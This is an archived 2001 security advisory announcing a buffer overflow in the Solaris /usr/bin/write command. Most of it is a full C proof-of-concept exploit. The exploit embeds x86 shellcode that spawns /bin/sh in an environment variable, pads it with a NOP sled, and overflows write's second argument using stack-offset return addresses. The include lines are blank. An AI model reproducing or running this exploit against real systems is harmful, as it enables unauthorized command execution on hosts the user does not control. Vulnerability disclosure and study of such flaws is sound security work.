Advisories : Solaris /usr/bin/write vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Solaris /usr/bin/write vulnerability

Title:	Solaris /usr/bin/write vulnerability
Released by:	Pablo Sor
Date:	17th January 2001
Printable version:	Click here

I have written an exploit for the /usr/bin/write command , this is not a

new

vulnerability but it has not been fixed at least till Solaris 7 patchs

(dont know about Solaris 8).

This command contains a buffer overflow in the second argument. If this

data exceeds predefined length, inserting two values into the argument

it is

possible to copy the first one into the memory position pointed by the

second

one, using this technique it is possible to execute arbitrary commands.

I have seen some messages saying that this vulnerability could not be

exploited eitherway

this command has sgid tty so I do not think it could generate serious

privileges problems.





Technical Description - Exploit/Concept Code:





#include 

#include 

/*



 /usr/bin/write overflow proof of conecpt.



 Tested on Solaris 7 x86



 Pablo Sor, Buenos Aires, Argentina. 01/2000

 psor@afip.gov.ar



 usage: write-exp [shell_offset] [ret_addr_offset]



 default offset should work.



*/

long get_esp() { __asm__("movl %esp,%eax"); }



char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"

               "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"

               "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"

               "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"

               "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"

               "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"

               "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"

               "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"

               "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"

               "\x73\x68\xff\xff\xff\xff\xff\xff\xff"

               "\xff\xff";



               /* shellcode by Cheez Whiz */



void main(int argc,char **argv)

{

FILE *fp;

long magic,magicret;

char buf[100],*envi;

int i;



envi = (char *) malloc(1000*sizeof(char));

memset(envi,0x90,1000);

memcpy(envi,"SOR=",4);

memcpy(envi+980-strlen(shell),shell,strlen(shell));

envi[1000]=0;

putenv(envi);



if (argc!=3)

{

 magicret = get_esp()+116;

 magic = get_esp()-1668;

}

else

{

 magicret = get_esp()+atoi(argv[1]);

 magic = get_esp()+atoi(argv[2]);

}



memset(buf,0x41,100);

buf[99]=0;

memcpy(buf+91,&magic,4);

for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);

execl("/usr/bin/write","write","root",buf,(char *)0);

}